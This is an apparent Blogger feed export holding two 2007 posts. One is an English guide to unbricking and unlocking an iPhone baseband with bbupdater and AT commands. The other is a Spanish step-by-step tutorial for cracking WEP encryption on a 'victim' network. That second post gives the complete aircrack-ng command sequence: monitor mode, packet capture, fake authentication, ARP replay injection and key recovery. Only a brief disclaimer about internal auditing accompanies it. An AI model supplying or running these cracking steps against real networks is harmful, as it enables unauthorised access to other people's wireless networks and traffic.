tag:blogger.com,1999:blog-51567390984107863172024-02-08T04:07:26.402-08:00NiGhT BlogNighthttp://www.blogger.com/profile/11195860158912812403noreply@blogger.comBlogger2125tag:blogger.com,1999:blog-5156739098410786317.post-67102664642622879012007-09-12T20:32:00.001-07:002007-09-13T15:57:19.701-07:00Iphone Unbricked Method (No Service)<img src="http://www.applesfera.com/images/2007/09/iphone2.jpg" border="0" height="250" width="350" /><br /><br /><br />well, i will post the step.. it work for SOFTWARE and HARDWARE BRICK, it work for me and another ppl using Orion007 method for upload file to baseband.<br /><br />when you have NO SERVICE and u have a succesfully unlock follow this:<br /><br /><br /><br />for request of the people download link: http://rapidshare.com/files/55123388/eepfiles.zip.html<br /><br />be carefull, file 3.12 is for firmware 1.0.0 and 3.14 for firmware 1.0.1 and 1.0.2<br />u need to use the file who correspond to your firmware.<br /><br /><br /><br />1 first unload commcenter with this command<br />launchctl unload -w /System/Library/LaunchDaemons/com.apple.CommCenter.plist<br /><br />2.enter to minicom and type<br />AT+CLCK="PN",0,"00000000"<br />it say error.... is OK!!<br /><br />3.type AT+CLCK="PN",2 it say 0, (this show u have unlocked iphone)<br /><br />4. run bbupdater -v<br /><br />5.upload to the baseband this file ICE03.14.08_G.eep using this command<br />bbupdater -e ICE03.14.08_G.eep<br /><br />6.restart the iphone and load the commcenter with this command<br />launchctl load -w /System/Library/LaunchDaemons/com.apple.CommCenter.plist<br /><br />7.enjoy your unbricked iphone!!!... and unlocked of course!<br /><br /><br />Orion007 Pd: You get the .eep file from the apple 1.0.2 full restore image<br /><br /><br /><br />pd2: if u have this error<br /><br />Error: Baseband bootloader is too old; update to 1.8 or later and try again<br /><br />follow this step:<br />bbupdater -f ICE03.14.08_G.fls (it locks again the iphone)<br />restore....<br />when u have the screen activation with the world back and it say incorrect sim but u have the at&t sim dont worry, activate it and do all the steps for unlock it again...<br /><br />when u have it unlocked<br />follow the guide unbricked iphone<br /><br />IF U DONT HAVE THIS ERROR DONT UPLOAD THE FLS BECAUSE IT LOCK THE IPHONE AGAIN.<br /><br />and ppl remember LOAD THE COMMCENTER if u dont do it u NEVER have signal even is u reboot the iphone u need to load because it dont load automatically.<br /><br /><br /><br />THANKS TO THE DEV TEAM, GEOHOT, ORION007 AND ALL THE PEOPLE IN UNDERNET #IPHONE.UNLOCKNighthttp://www.blogger.com/profile/11195860158912812403noreply@blogger.com15tag:blogger.com,1999:blog-5156739098410786317.post-4858935857764508002007-07-30T18:26:00.000-07:002007-08-16T18:16:22.626-07:00Activar Macbook Modo Monitor (Crack Wep)<img src="http://images.appleinsider.com/macbook-8.jpg" border="0" height="350" width="450" /><br /><br /><br />Bueno, si su pregunta es puedo realizar captura de trafico e inyeccion a la vez con macbook desde linux.. la respuesta es SI ahi les explico como.... (Realizado en un macbook core duo).<br /><br />Primero tienen q bajar gratuitamente el livecd Backtrack 2.0 desde este link <a href="http://mirror.switch.ch/ftp/mirror/backtrack/bt2final.iso">http://mirror.switch.ch/ftp/mirror/backtrack/bt2final.iso</a><br /><br />1. bootear el livecd manteniendo la tecla C apretada hasta que bootee y vean un Boot:<br />2. En esta parte (Boot:) deberan ejecutar este comando <span style="font-weight: bold;">bt noapic irqpoll acpi=force</span>, este comando sirver para que no les dupliquen las teclas un bug que tiene backtrack.....<br />3. una vez dentro ejecutamos: <span style="font-weight: bold;">modprobe ath_pci</span><br />4. despues paramos la interfaz wifi: <span style="font-weight: bold;">airmon-ng stop ath0</span><br />5. ponemos en modo monitor la interfaz: <span style="font-weight: bold;">airmon-ng start wifi0 9</span>, es un cero despues de wifi por las dudas...<br />6. levantamos la interfaz: <span style="font-weight: bold;">ifconfig ath0 up</span><br />7. hagamos de cuenta que ya ejecutamos <span style="font-weight: bold;">kismet</span> y vimos el canal de la victima y su ssid por ejemplo canal 1, ssid prueba, realizamos la captura de trafico con este comando: <span style="font-weight: bold;">airodump-ng -c 1 -w dump ath0</span>, -c seleccionas el canal con -w seleccionamos como se llama el archivo con la captura.<br />8. suponiendo que no hay ningun cliente conectado realizado un fake authentication con el siguiente comando: <span style="font-weight: bold;">aireplay-ng -1 6000 -o 1 -q 10 -e prueba -a (aca ponen la macaddress del access point) -h (ponemos la mac address de nuestra tarjeta wifi) ath0</span>, -e aca ponen el nombre del ssid, este comando envia paquetes keep alive para que poder realizar la inyeccion de trafico, antes del keep alive tienen q ver un succesfull ;-) o algo asi y despues lo keep alive...<br />9. ahora si a inyectar trafico!!! con este comando.. <span style="font-weight: bold;">aireplay-ng -3 -b (mac address Acess point) -h (mac address tarjeta wifi) ath0</span>, van a ver read packet y arp replay el arp replay va a estar en 0 pero esperan q en read packet llegue a 4000 paquetes o mas o menos depende..<br />10. bueno ahora volvemos a la terminal corriendo el airodump y vemos en la parte de data como sube calculen que para un clave de 64k necesitamos unas 100000 ivs o data como lo ven ahi.<br />11. mientras esta capturando podemos correr el aircrack y va desencriptando online mientras el airodump captura los paquetes... con este comando.. <span style="font-weight: bold;">aircrack-ng -a 1 dump.cap</span><br /><br />A disfrutarrrr!!!!!!!!<span style="font-size:130%;"> aclaro... este tutorial sirve a modo de auditoria interna no hagan cagadassss.... ; D<br /></span>Nighthttp://www.blogger.com/profile/11195860158912812403noreply@blogger.com7